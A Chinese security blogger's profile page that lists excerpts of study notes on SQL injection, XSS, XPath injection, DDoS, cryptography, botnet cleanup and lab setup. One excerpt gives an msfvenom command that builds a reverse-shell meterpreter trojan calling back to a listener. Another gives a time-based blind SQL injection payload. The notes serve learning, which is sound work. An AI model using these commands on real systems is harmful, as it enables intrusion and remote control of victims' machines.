自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 资源 (1)
  • 收藏
  • 关注

原创 ELK搭建详细配置

下载安装包:https://www.elastic.co/downloads我下载的是:elasticsearch-7.8.0-linux-x86_64.tar.gz 、kibana-7.8.0-linux-x86_64.tar.gz、logstash-7.8.0.tar.gz分别拷贝到机器上:先安装tomcatyum install tomcat安装完成后,java -version看下是否安装成功首先安装elsticsearch:安装完成后,创建启用服务的用户: 1、groupadd

2020-07-01 14:35:52 802

原创 SQL注入进阶

SQL注入进阶:1)时间注入攻击:时间注入利用sleep()或者benchmark()等函数让MYSQL的执行时间变长。时间盲注多余IF(expr1,expr2,expr3)结合使用,此if语句的含义是:如果expr1是TRUE,则if的返回值为expr2;否则返回的值为expr3 。所以判断数据库名长度的的语句应为:if (length(database())>1,sleep(5),1)...

2020-06-02 09:13:12 247

原创 应用层DDOS

应用层DDOS不同于网络层DDOS,由于发生在应用层,因此TCP三次握手已经完成,连接已经建立完成,所以发起攻击的IP地址都是真实存在的。CC攻击: CC攻击的前身是一个叫fatboy的攻击程序,当时黑客为了挑战绿盟的一款反DDOS设备开发了它。绿盟是中国著名的安全公司之一,它有一款叫黑洞(Collapaser)的反DDOS设备,能够有效的清洗SYN FLOOD等有害流量,而黑客则挑衅式的将fa...

2020-05-06 14:50:08 490

原创 加密算法与随机数

1.1 概述: 常见的加密算法分为分组加密算法和流加密算法两种,两者的实现原理不同。 1)分组加密算法基于分组(block)进行操作,根据算法的不同,每个分组的长度可能不同。分组加密算法的代表有DES 3-DES Blowfish IDEA AES 等。 2)流加密算法则每次只处理一个字节,秘钥独立于消息之外,连个通过异或实现加密与解密,流加密算法的代表有RC4 ORYX SEAL等。 ...

2020-04-30 18:04:12 2167

原创 SQL注入攻击学习

以注入位置分类:1)GET注入2)POST注入3)Cookie注入4)搜索注入以参数类型分类:1)字符注入2)数字注入以注入技术分类:1)错误注入 (通过构造特殊的申SQL语句,根据错误信息,确认SQL注入点)原理:通过数据库报错信息,可以探测到数据库的类型和其他有用的信息举例:通过单引号字符(通过输入单引号,触发数据库异常,通过异常日志诊断数据库类型)2)布尔注入3)U...

2020-04-26 19:02:59 191

原创 XSS(跨站脚本攻击)攻击学习

XSS分类:1)反射型XSS (简单的把用户输入的数据反射给浏览器,也就是说,黑客往往需要诱使用户点击一个恶意链接才能攻击成功。)2)存储型XSS (把用户输入的数据存储到服务器端,每个点击的用户都可能被攻击。)3)DOM based XSS (从效果上来说DOM型XSS可以看做为反射型,通过修改页面DOM节点形成的XSS 我们称之为 DOM based XSS)XSS攻击成功后,攻击者能...

2020-04-26 18:22:19 501

原创 X-path注入

本文为英文翻译,仅做笔者学习使用摘要:可扩展标记语言(XML)被不同的组织采用,作为web服务和internet应用程序的数据交换格式。XML很容易受到黑客的攻击。XML的常用黑客技术是XPath注入。攻击者可以利用XPath操作数据库。XPath注入攻击甚至可以绕过系统安全,结果可能是灾难性的。在这次交流中,使用一个案例研究来回顾XPath代码盲注入问题。本文讨论了问题的范围以及管理和解决X...

2020-04-24 10:42:06 583

原创 记一次比尔盖茨僵尸网络病毒处理过程

记一次比尔盖茨僵尸网络病毒(通过rkhunter 扫描发现)处理过程(处理过程中发现有守护进程,所以直接越过重复查找的过程):1、 发现机器存在大量外联,紧急封堵网络。2、 查看top 进程,发现可疑进程:3、 通过lsof 查看进程关联的文件:4、 查看定时任务 发现恶意定时任务:5、 进入到定时任务文件夹查看:6、 查看开机启动列表:7、 查找恶意文件位置:8、 通...

2020-04-03 14:57:53 952 1

原创 Metasploit 生成反弹连接木马

“注 本文为笔者学习过程中记录”Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe生成一个名为 test.exe 的木马文件到msf目录下Step2: 通过 msfconsole 命令进入metasploit :Step3...

2020-04-01 12:57:12 1325

原创 kali 搭建vulhub docker-compose报错

本文为笔者安装vulhub的过程中遇到的问题,仅作为学习参考。docker-compose报错:No module named ssl_match_hostname ; ImportError: No module named shutil_get_terminal_size报错原因:找不到 ssl_match_hostname解决办法:1、cd /usr/local/lib/pyth...

2020-04-01 12:52:21 887

X-path注入.pdf

Xpath注入攻击介绍,本pdf为全英文

2020-04-24

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除